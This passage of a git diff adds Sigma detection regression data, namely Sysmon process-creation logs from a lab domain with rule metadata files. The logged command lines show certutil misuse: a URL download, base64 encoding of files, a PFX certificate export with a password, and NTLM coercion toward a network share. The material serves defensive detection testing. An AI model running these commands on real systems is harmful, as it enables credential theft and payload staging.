"SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/info.yml new file mode 100644 index 000000000..77577cd85 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/info.yml @@ -0,0 +1,13 @@ +id: 76e024fd-9064-46ae-85f8-c524dc6b3492 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829 + title: Suspicious File Downloaded From Direct IP Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.evtx new file mode 100644 index 000000000..bfc51182e Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.json b/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.json new file mode 100644 index 000000000..27dce7a6b --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:02:36.900637Z" + } + }, + "EventRecordID": 11537869, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:02:36.894", + "ProcessGuid": "5AA13A44-02AC-68FD-7A35-000000004002", + "ProcessId": 6484, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil.exe -urlcache -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/refs/heads/master/atomics/T1001.002/T1001.002.yaml atomic.yaml", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/info.yml new file mode 100644 index 000000000..69a87ef61 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/info.yml @@ -0,0 +1,13 @@ +id: 507f6de5-f414-4825-b1a3-e8909fdc8700 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794 + title: Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.evtx new file mode 100644 index 000000000..a24493108 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.json b/regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.json new file mode 100644 index 000000000..e27376def --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:04:22.017117Z" + } + }, + "EventRecordID": 11570013, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:04:22.010", + "ProcessGuid": "5AA13A44-0316-68FD-8535-000000004002", + "ProcessId": 3980, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil -encode file.bat file_.base64", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_encode/info.yml new file mode 100644 index 000000000..cbffd1a7d --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_encode/info.yml @@ -0,0 +1,13 @@ +id: 70e4269e-9d3c-4bfb-ad84-0b63124ad0a2 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a + title: File Encoded To Base64 Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.evtx new file mode 100644 index 000000000..a24493108 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.json b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.json new file mode 100644 index 000000000..e27376def --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:04:22.017117Z" + } + }, + "EventRecordID": 11570013, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:04:22.010", + "ProcessGuid": "5AA13A44-0316-68FD-8535-000000004002", + "ProcessId": 3980, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil -encode file.bat file_.base64", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/info.yml new file mode 100644 index 000000000..e9c14e662 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/info.yml @@ -0,0 +1,13 @@ +id: 7033fe69-1fd7-4da2-b525-222c1b087107 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: ea0cdc3e-2239-4f26-a947-4e8f8224e464 + title: Suspicious File Encoded To Base64 Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.evtx new file mode 100644 index 000000000..25f49180b Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.json b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.json new file mode 100644 index 000000000..2b673ca59 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:05:11.334152Z" + } + }, + "EventRecordID": 11585346, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:05:11.327", + "ProcessGuid": "5AA13A44-0347-68FD-8B35-000000004002", + "ProcessId": 6780, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil -encode C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Network\\sr011.xml C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Network\\conv.xml", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/info.yml new file mode 100644 index 000000000..0d8a289ea --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/info.yml @@ -0,0 +1,13 @@ +id: bfbc8981-818e-4de5-b7a4-1bb3d4a08792 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 82a6714f-4899-4f16-9c1e-9a333544d4c3 + title: File In Suspicious Location Encoded To Base64 Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.evtx new file mode 100644 index 000000000..71da251ef Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.json b/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.json new file mode 100644 index 000000000..9ec2762cb --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:23:42.049726Z" + } + }, + "EventRecordID": 11818106, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:23:42.043", + "ProcessGuid": "5AA13A44-079E-68FD-0236-000000004002", + "ProcessId": 2456, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil -p secret_password -exportPFX root 1c6119aff8414c91487c4e02d18dd73D c:\\cert.pfx", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/info.yml new file mode 100644 index 000000000..83cf4ab17 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/info.yml @@ -0,0 +1,13 @@ +id: 387ea4f5-f74d-4b14-a1a7-db8c97fb56c2 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5 + title: Certificate Exported Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.evtx new file mode 100644 index 000000000..394724e61 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.json b/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.json new file mode 100644 index 000000000..4fde9eb48 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:26:24.815458Z" + } + }, + "EventRecordID": 11867155, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:26:24.808", + "ProcessGuid": "5AA13A44-0840-68FD-1336-000000004002", + "ProcessId": 4424, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil -syncwithWU \\\\10.0.1.14\\my-share", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/info.yml new file mode 100644 index 000000000..f5243b532 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/info.yml @@ -0,0 +1,13 @@ +id: 32397458-1d93-45ee-a3c8-9efebb81d9d1 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 6c6d9280-e6d0-4b9d-80ac-254701b64916 + title: Potential NTLM Coercion Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.evtx b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.evtx new file mode 100644 index 000000000..643bec0f9 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.json b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.json new file mode 100644 index 000000000..d845f2520 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:27:26.975358Z" + } + }, + "EventRecordID": 11886324, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:27:26.974", + "ProcessGuid": "5AA13A44-087E-68FD-1A36-000000004002", + "ProcessId": 6788, + "Image": "C:\\Windows\\System32\\chcp.com", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Change CodePage Utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CHCP.COM", + "CommandLine": "chcp", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=0489A9D0B4342F9C87C03510E0073898864946A5,MD5=0714C0100E008D00EC82E7B549595F69,SHA256=A807B535F7176642FC87911D185C10B00981388CDA68F5B8E2FF4C73FF514352,IMPHASH=75FA51C548B19C4AD5051FAB7D57EB56", + "ParentProcessGuid": "5AA13A44-087E-68FD-1936-000000004002", + "ParentProcessId": 8248, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "cmd.exe /c chcp", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/info.yml b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/info.yml new file mode 100644 index 000000000..474b736e4 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/info.yml @@ -0,0 +1,13 @@ +id: 30e3935a-84b4-45ad-85e2-c209c57dbfa7 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 7090adee-82e2-4269-bd59-80691e7c6338 + title: Console CodePage Lookup Via CHCP +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.evtx b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.evtx new file mode 100644 index 000000000..940197001 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.json b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.json new file mode 100644 index 000000000..fc3726adb --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + 